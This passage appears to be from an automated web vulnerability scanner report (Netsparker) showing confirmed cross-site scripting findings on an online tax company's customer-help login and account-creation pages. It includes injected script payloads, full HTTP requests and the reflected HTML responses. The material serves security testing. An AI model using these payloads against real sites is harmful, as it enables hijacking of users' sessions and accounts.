valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="10"> &nbsp; </td> </tr> <tr><td colspan="8"></td></tr> <tr><td colspan="8"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form" width="100%"><table cellpadding="2" cellspacing="0" border="0" width="100%"><tr><td colspan="2" class=title>&nbsp;Login Failed</td></tr><tr><td colspan="2" class="textcell"><table><tr><td class="textcell">The username and password combination you provided is invalid or your account has been disabled.<p />If you believe you may have mistyped either value, use the browser <b>Back</b> button to return to the login page and try again.<p />If you have forgotten your username or password please visit <a href='acct_assistance.php'>Account Assistance</a> to recover your account credentials.</td></tr></table></td></tr></table></td><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/bl.gif" alt="" /></td><td class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/br.gif" alt="" /></td></tr></table></form><p><table border="0" cellpadding="0" cellspacing="0" width="790" background="https://www.olt.com/main/home/images/back-tiles.gif"> <tr> <td height=17> <div class="foot"> <a href="https://www.olt.com/main/home/default.asp">Home</a> | <a href="https://www.olt.com/main/home/about.asp">About Us</a> | <a href="https://www.olt.com/main/home/payment.asp">Payment Options</a> | <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> | <a href="https://www.olt.com/main/home/states.asp">States</a> | <a href="https://www.olt.com/main/home/getstarted.asp">Get Started</a> | <a href="https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php">Customer Service Live help</a> </div> </td> </tr></table><div class="tiny"> <a href="https://www.olt.com/main/home/privacysecurity.asp">Privacy/Security</a> | <a href="https://www.olt.com/main/home/disclaimer.asp">Disclaimer/Terms Of Use</a> | <a href="https://www.olt.com/main/home/sitemap.asp">Site Map</a> | <a href="https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php">Customer Service Live help</a> <br><br> &copy; On-Line Taxes, Inc.<br> 724 Jules Street<br> St Joseph, MO 64501<br> Ph: 1-816-232-0095 | Fax: 1-816-232-1591 </div></body></html>
- /cgi-bin/olt.cfg/php/enduser/acct_login_submit.php

/cgi-bin/olt.cfg/php/enduser/acct_login_submit.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login_submit.php

Parameters

Parameter Type Value
OLTSite POST OLTFree73541'"--></style></script><script>alert(0x001020)</script>
p_sid POST TyYLtJsk
p_next_page POST myovr.php
p_userid POST 3
p_passwd POST 3

Request

POST /cgi-bin/olt.cfg/php/enduser/acct_login_submit.php HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=OLTFree%0073541
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Content-Length: 169
Accept-Encoding: gzip, deflate

OLTSite=OLTFree73541%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001020)%3C%2Fscript%3E&p_sid=TyYLtJsk&p_next_page=myovr.php&p_userid=3&p_passwd=3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 23:06:34 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=101062 t=1304118394695710
RNT-Machine: 04
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2164
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Login Failed</title></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" action="dummy"><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x001020)%5C/script%5E&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x001020)%5C/script%5E&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x001020)%5C/script%5E&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x001020)%5C/script%5E&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect="> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="seltabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="seltabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="seltabbtn" href="acct_login.php?OLTSite=OLTFree73541'"--></style></script><script>netsparker(0x001020)</script>&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect="> &nbsp;&nbsp;Login&nbsp;&nbsp; </a> </td> <td width="1%" class="seltabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> <td width="1%">&nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> &nbsp; </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form" width="100%"><table cellpadding="2" cellspacing="0" border="0" width="100%"><tr><td colspan="2" class=title>&nbsp;Login Failed</td></tr><tr><td colspan="2" class="textcell"><table><tr><td class="textcell">The username and password combination you provided is invalid or your account has been disabled.<p />If you believe you may have mistyped either value, use the browser <b>Back</b> button to return to the login page and try again.<p />If you have forgotten your username or password please visit <a href='acct_assistance.php'>Account Assistance</a> to recover your account credentials.</td></tr></table></td></tr></table></td><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/bl.gif" alt="" /></td><td class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/br.gif" alt="" /></td></tr></table></form><p><table border="0" cellpadding="0" cellspacing="0" width="790" background="https://www.olt.com/main/home/images/back-tiles.gif"> <tr> <td height=17> <div class="foot"> <a href="https://www.olt.com/main/home/default.asp">Home</a> | <a href="https://www.olt.com/main/home/about.asp">About Us</a> | <a href="https://www.olt.com/main/home/payment.asp">Payment Options</a> | <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> | <a href="https://www.olt.com/main/home/states.asp">States</a> | <a href="https://www.olt.com/main/home/getstarted.asp">Get Started</a> | <a href="https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php">Customer Service Live help</a> </div> </td> </tr></table><div class="tiny"> <a href="https://www.olt.com/main/home/privacysecurity.asp">Privacy/Security</a> | <a href="https://www.olt.com/main/home/disclaimer.asp">Disclaimer/Terms Of Use</a> | <a href="https://www.olt.com/main/home/sitemap.asp">Site Map</a> | <a href="https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php">Customer Service Live help</a> <br><br> &copy; On-Line Taxes, Inc.<br> 724 Jules Street<br> St Joseph, MO 64501<br> Ph: 1-816-232-0095 | Fax: 1-816-232-1591 </div></body></html>
- /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php

/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=8D9NtJsk&p_lva=3&p_sp..

Parameters

Parameter Type Value
p_sid GET 8D9NtJsk
p_lva GET 3
p_sp GET 3
p_li GET 3
p_accessibility GET 3
p_redirect GET 3
p_countryid POST 3
p_email POST '"--></style></script><script>alert(0x001101)</script>
p_email_alt1 POST netsparker@example.com
p_email_alt2 POST netsparker@example.com
p_first_name POST Smith
p_last_name POST Smith
p_next_page POST 3
p_passwd POST 3
p_passwd2 POST 3
p_ph_asst POST 3
p_ph_fax POST 3
p_ph_home POST 3
p_ph_mobile POST 3
p_ph_office POST 3
p_postal_number POST 3
p_provid POST 3
p_question POST 3
p_subject POST 3
p_token POST
p_userid POST 3
submit_btn POST Create Account

Request

POST /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=8D9NtJsk&p_lva=3&p_sp=3&p_li=3&p_accessibility=3&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Content-Length: 425
Accept-Encoding: gzip, deflate

p_countryid=3&p_email=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001101)%3C%2Fscript%3E&p_email_alt1=netsparker%40example.com&p_email_alt2=netsparker%40example.com&p_first_name=Smith&p_last_name=Smith&p_next_page=3&p_passwd=3&p_passwd2=3&p_ph_asst=3&p_ph_fax=3&p_ph_home=3&p_ph_mobile=3&p_ph_office=3&p_postal_number=3&p_provid=3&p_question=3&p_subject=3&p_token=&p_userid=3&submit_btn=Create+Account

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 23:07:37 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Fri, 29-Apr-2011 23:27:37 GMT
RNT-Time: D=196190 t=1304118457485710
RNT-Machine: 12
X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Create a New Account</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script><script type="text/javascript"> // --------------------------------------------var _submit_accepted = false;var phone_numbers = new Array('', '', '', '', '');var p_postal_emask, p_postal_fstr, p_postal_dmask;var p_contact_phone_emask, p_contact_phone_fstr, p_contact_phone_dmask;var no_test = false, mask_str = null, cur_mask = null;var old_phone = 0;var postal_number = '';var submit_flag = true;// ----------------------------------------------------------------------------function _putCustomFieldMasks(formName){ for(i = 0; i < _fields.length; i++) if(_fields[i].name.match('_ccf_')) if(document[formName]['custom_text_' + _fields[i].name]) put_mask(_fields[i].name, document[formName]['custom_text_' + _fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + _fields[i].name]) { put_mask(_fields[i].name, document[formName]['custom_text_lh_' + _fields[i].name].value, document[formName], 0); document.getElementById(_fields[i].name + '_mask').innerHTML=''; }}// ----------------------------------------------------------------------------function init(){}// ----------------------------------------------------------------------------function _do_submit(form){ var chk_val, ph_mask, pt_mask; var msgs = new Array( "The username you have entered contains spaces. Please try again.", "Username must not contain quote characters. Please try again.", "The passwords you have entered do not match.\n\nPlease re-enter them.", "Passwords must be at least 5 characters long."); if ((form.p_email.value != "") && (form.p_email.value == form.p_email_alt1.value || form.p_email.value == form.p_email_alt2.value || ((form.p_email_alt1.value != "") && (form.p_email_alt1.value == form.p_email_alt2.value)))) { alert("An email address must be unique across the Email Address, Email Alt 1, and Email Alt 2 fields."); return(false); } if (_submit_accepted) // prevents NN4 resubmission return(false); if (!_validate_acctinfo(form.p_userid, form.p_passwd, form.p_passwd2, 5, msgs)) return(false); chk_val = _check_fields(form.name, fld_data, _fields); form.submit_btn.disabled = chk_val; _submit_accepted = chk_val; if (!chk_val) return (false); return(chk_val);}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function change_phone(num, sel_val){ phone_numbers[old_phone] = num.value; num.value = phone_numbers[sel_val]; old_phone = sel_val;}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function reset_phone(){ document._main.p_contact_phone.value = ''; phone_numbers = ['', '', '', '', ''];}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -var _fields = new Array (new field('p_userid', "Username", 5, 80, 33),new field('p_passwd', "Password", 5, 0, 0),new field('p_email', "Email Address", 5, 0, 37),new field('p_email_alt1', "Email Address", 5, 0, 36),new field('p_email_alt2', "Email Address", 5, 0, 36),new field('p_first_name', "First Name", 5, 0, 33),new field('p_last_name', "Last Name", 5, 0, 33),new field('', '', 0, 0, 0));var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:");// ------------------------------------------------------------------ </script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor" onLoad="_set_cursor(); init(); _putCustomFieldMasks('_main')"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" name="_main" method="post" action="acct_new_submit.php?p_sid=iqiL5Ksk&amp;p_lva=3&amp;p_sp=&amp;p_li=3&amp;p_accessibility=&amp;p_redirect=" onSubmit="return(_do_submit(this))"><input type="hidden" name="p_next_page" value="3" /><input type="hidden" name="p_countryid" value="3" /><input type="hidden" name="p_provid" value="3" /><input type="hidden" name="p_ph_office" value="3" /><input type="hidden" name="p_ph_mobile" value="3" /><input type="hidden" name="p_ph_fax" value="3" /><input type="hidden" name="p_ph_asst" value="3" /><input type="hidden" name="p_ph_home" value="3" /><input type="hidden" name="p_postal_number" value="3" /><input type="hidden" name="p_token" value="" /><input type="hidden" name="p_subject" value="3" /><input type="hidden" name="p_question" value="3" /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=&p_sid=iqiL5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=&p_sid=iqiL5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=&p_sid=iqiL5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" 